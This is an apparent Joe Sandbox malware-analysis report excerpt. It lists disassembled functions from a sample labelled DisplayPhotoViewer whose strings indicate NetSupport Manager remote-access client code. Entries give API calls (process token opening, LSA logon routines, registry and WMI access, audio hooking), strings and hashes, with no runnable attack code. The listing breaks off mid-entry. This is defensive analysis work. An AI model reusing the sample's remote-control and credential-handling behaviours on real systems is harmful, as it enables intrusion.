                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ItemText
                                                                                                    • String ID: %02d:%02d$%d:%02d:%02d$AckDlgTimeoutAccept$Client$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 3736328045-931665787
                                                                                                    • Opcode ID: 32ce343acb54bc761c1be489ed33dad1110b6177ab4317886434216ca3f82ce1
                                                                                                    • Instruction ID: fddd4b7449233392fe5952f74f27d384eaa1ddbcc2dc021834a8ed1e10f2bc7a
                                                                                                    • Opcode Fuzzy Hash: 32ce343acb54bc761c1be489ed33dad1110b6177ab4317886434216ca3f82ce1
                                                                                                    • Instruction Fuzzy Hash: BB410775E10619ABDB14DBA4CC85FEEB7B5FB84718F004229E816A7281FA30B905CB91
                                                                                                    Function 11153280 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 77threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 111532CA
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 111532E9
                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,?,0B2326C8), ref: 111532FF
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,0002000B,?), ref: 1115332C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1115334E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$OpenWindow$CloseFindHandleThreadToken
                                                                                                    • String ID: *ShellWndClass$..\ctl32\WMM.CPP$Client$Progman$hProcess
                                                                                                    • API String ID: 2107570828-3172847105
                                                                                                    • Opcode ID: 9c6e822064248c38b6bb245f484d99e01b5fad97a2eff947b5722baa29d120f0
                                                                                                    • Instruction ID: 8751a0780d8dcbc12aaceb1720da0bb874bc767e61fb731b8c025e855cc0987d
                                                                                                    • Opcode Fuzzy Hash: 9c6e822064248c38b6bb245f484d99e01b5fad97a2eff947b5722baa29d120f0
                                                                                                    • Instruction Fuzzy Hash: 3C219074B14618ABDB81DFA0DD85FEEF7B8EB48708F408059FD15A7284EB30A910C765
                                                                                                    Function 110A74D0 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 38libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Secur32.dll,?,11179C9B,110A7CA5,218EC38C,00000000,?,00000000), ref: 110A74E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,LsaRegisterLogonProcess), ref: 110A7501
                                                                                                    • GetProcAddress.KERNEL32(00000000,LsaLogonUser), ref: 110A750E
                                                                                                    • GetProcAddress.KERNEL32(?,LsaFreeReturnBuffer), ref: 110A751B
                                                                                                    • GetProcAddress.KERNEL32(?,LsaLookupAuthenticationPackage), ref: 110A7528
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: LsaFreeReturnBuffer$LsaLogonUser$LsaLookupAuthenticationPackage$LsaRegisterLogonProcess$Secur32.dll
                                                                                                    • API String ID: 2238633743-4075821787
                                                                                                    • Opcode ID: 53222920044594163debc0ab317fffd86b8f6d2aa07e119cf56005ca3d81ea3f
                                                                                                    • Instruction ID: 2f611636caa2edd968ff3169624b98a915870241ca66a1e28c8aed72611994d7
                                                                                                    • Opcode Fuzzy Hash: 53222920044594163debc0ab317fffd86b8f6d2aa07e119cf56005ca3d81ea3f
                                                                                                    • Instruction Fuzzy Hash: 90F062B1A007149FC730AF6BDC44D5AFBE8BF946103518D1FE4A6D3668D6B4A4418F54
                                                                                                    Function 1102B0E0 Relevance: 16.7, APIs: 1, Strings: 10, Instructions: 197sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(000001F4,000000D0,11044570,00000000), ref: 1102B294
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: *channel$CLIENT32.CPP$Client$Eval$IsA()$SetChannel(%s), oldchan=<%s>$_License$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$gMain.cfg == m_cfg$licensee
                                                                                                    • API String ID: 3472027048-3511930441
                                                                                                    • Opcode ID: e4171e01cbb41f55865f6996c616d49d5ed2212dd8b988d2df533028ab213449
                                                                                                    • Instruction ID: 0abde7a7f891eee350a2c1237c0acb8ed14f815d25f3eebdf77b10db9a3c403a
                                                                                                    • Opcode Fuzzy Hash: e4171e01cbb41f55865f6996c616d49d5ed2212dd8b988d2df533028ab213449
                                                                                                    • Instruction Fuzzy Hash: A8716138E0061BABDB04DBE5DC50FEEF7B5AF95708F508158E92567280EB707905CB61
                                                                                                    Function 1103F9C0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 1103F9FB
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,0006029E,?,00000002,00002710,?), ref: 1103FBF0
                                                                                                    • _free.LIBCMT ref: 1103FBF7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                                    • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                                                                    • API String ID: 1897251511-2508660115
                                                                                                    • Opcode ID: 05be87f0668f383673c5ea41fad6aed4ab4e66b80e1e4536e447f22e00de72a5
                                                                                                    • Instruction ID: 325393943f12335c5e4e5f220104c331d2f41844f0190a8f10e6acaf3d6cd9b6
                                                                                                    • Opcode Fuzzy Hash: 05be87f0668f383673c5ea41fad6aed4ab4e66b80e1e4536e447f22e00de72a5
                                                                                                    • Instruction Fuzzy Hash: C6719DB5E1061A9FDB04CFD5CC80EEEF7B5AF88305F10816DE955A7284E770A906CB92
                                                                                                    Function 11151450 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,218EC38C,00000000,?), ref: 11151497
                                                                                                    • CoCreateInstance.OLE32(111B8ADC,00000000,00000017,111B8A0C,?), ref: 111514B7
                                                                                                    • wsprintfW.USER32 ref: 111514D7
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 111514E3
                                                                                                    • wsprintfW.USER32 ref: 11151597
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 11151638
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                    • API String ID: 3050498177-823534439
                                                                                                    • Opcode ID: 5b6a006cfdc6b437111f67b21c6f49fa06bbdb6d8cd3c592a934d301938bc6c9
                                                                                                    • Instruction ID: 0cf9d1d24786640cc68b733bed4ae13531d68a6f3d23fdcde8e95de2130a07a5
                                                                                                    • Opcode Fuzzy Hash: 5b6a006cfdc6b437111f67b21c6f49fa06bbdb6d8cd3c592a934d301938bc6c9
                                                                                                    • Instruction Fuzzy Hash: 1251A171B40218AFC761CB69CC84F9AF7B8EB8A714F1442A9E819E7640DB70AE41CB51
                                                                                                    Function 1100B6C0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetOverlappedResult.KERNEL32(?,218EC14C,FFFFFFFF,00000001), ref: 1100B70C
                                                                                                    • GetLastError.KERNEL32 ref: 1100B716
                                                                                                    • GetTickCount.KERNEL32 ref: 1100B779
                                                                                                    • wsprintfA.USER32 ref: 1100B7B6
                                                                                                    • ResetEvent.KERNEL32(?), ref: 1100B86F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                                    • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                                    • API String ID: 3598861413-432254317
                                                                                                    • Opcode ID: af520caff937272eb15d7a4932dc547efb0ebbbeb8388e77e2d8af9d60cd4234
                                                                                                    • Instruction ID: 35eca0ba24291c0ef887293c51a6740232971be1b7f9cf870343342f3d4057c9
                                                                                                    • Opcode Fuzzy Hash: af520caff937272eb15d7a4932dc547efb0ebbbeb8388e77e2d8af9d60cd4234
                                                                                                    • Instruction Fuzzy Hash: E251F1B9900A16ABE710CF65CC84ABBB7F8FF44749F04851DF96992281E7347940C7A5
                                                                                                    Function 110252D0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11025313
                                                                                                      • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
                                                                                                      • Part of subcall function 110EEBE0: LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C,00000002,00000000,00000000), ref: 110EEC1F
                                                                                                      • Part of subcall function 110EEBE0: GetCurrentProcessId.KERNEL32 ref: 110EEC61
                                                                                                      • Part of subcall function 110EEBE0: GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110EEC6E
                                                                                                      • Part of subcall function 110EEBE0: FreeLibrary.KERNEL32(?), ref: 110EED0B
                                                                                                    • wsprintfA.USER32 ref: 11025349
                                                                                                    • wsprintfA.USER32 ref: 110253B5
                                                                                                    • wsprintfA.USER32 ref: 110253ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$Library$AddressCurrentFileFreeLoadModuleNameProcProcess_strrchr
                                                                                                    • String ID: %d.exe$TraceModuleName$_Debug$trace$tracefile
                                                                                                    • API String ID: 3659486034-589725905
                                                                                                    • Opcode ID: ce775b358349740f3ca80521c4ba594498a18f83eddb3421fabaf2e10f794c8f
                                                                                                    • Instruction ID: 29647b7a3bfb1805975f820d1a93f4f7ccc676230129df492f27dcd346966d9d
                                                                                                    • Opcode Fuzzy Hash: ce775b358349740f3ca80521c4ba594498a18f83eddb3421fabaf2e10f794c8f
                                                                                                    • Instruction Fuzzy Hash: 30411B35F001195BCB01CF69ED81AFEF7E9DF8931DF4081A9ED4AD7280EA7199058791
                                                                                                    Function 110556D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,00000000,00000000,74DF23A0,11055977,00000000,00000000), ref: 11055728
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1105584A
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 110557DD
                                                                                                    • RegDeleteValueA.ADVAPI32(?,?), ref: 110557FD
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11055807
                                                                                                    • SetEvent.KERNEL32(?), ref: 11055840
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                                                                    • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                                                                    • API String ID: 1302350719-2578778249
                                                                                                    • Opcode ID: 834111dadae7a7909c8106d536f480ffdd72fbc195f0e71753fc9f600de3ba17
                                                                                                    • Instruction ID: eff8933b09e146a54e55651f9814a20418f7653f0f2e0b37b093a0256d9fdb3b
                                                                                                    • Opcode Fuzzy Hash: 834111dadae7a7909c8106d536f480ffdd72fbc195f0e71753fc9f600de3ba17
                                                                                                    • Instruction Fuzzy Hash: B941F376E0061AEFC781CFA4DCC0AAEBBA5FB45714F108569ED25DB240E732E905CB90
                                                                                                    Function 1113B380 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 139registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(111E4A50,75BF8400), ref: 1113B3B0
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1113B3EF
                                                                                                    • _memset.LIBCMT ref: 1113B40D
                                                                                                      • Part of subcall function 11139370: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
                                                                                                    • _strncpy.LIBCMT ref: 1113B4CF
                                                                                                      • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1113B4DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                    • String ID: CSDVersion$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                    • API String ID: 3299820421-3310072378
                                                                                                    • Opcode ID: dce2d10279435452cbdc46fb73c4f38affaae88b965e818eb0aa6c1d9eb7f86a
                                                                                                    • Instruction ID: 179e5faa9f7bf6ee2b7192873a2362bff12b0175902a6d15064a4905d280dfd9
                                                                                                    • Opcode Fuzzy Hash: dce2d10279435452cbdc46fb73c4f38affaae88b965e818eb0aa6c1d9eb7f86a
                                                                                                    • Instruction Fuzzy Hash: 8F415C70E1025A9BDB61CFA0DD41BAEF7A5BBC132DF000068E81B96584F734AA44CB99
                                                                                                    Function 1104903F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • PostMessageA.USER32(0000FFFF,0000C1F0,00000000,00000000), ref: 11049135
                                                                                                    • PostMessageA.USER32(0006029E,0000048F,00000032,00000000), ref: 11049166
                                                                                                    • PostMessageA.USER32(0006029E,00000483,00000000,00000000), ref: 11049178
                                                                                                    • PostMessageA.USER32(0006029E,0000048F,000000C8,00000000), ref: 1104918C
                                                                                                    • PostMessageA.USER32(0006029E,00000483,00000001,?), ref: 110491A3
                                                                                                    • PostMessageA.USER32(0006029E,00000800,00000000,00000000), ref: 110491B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
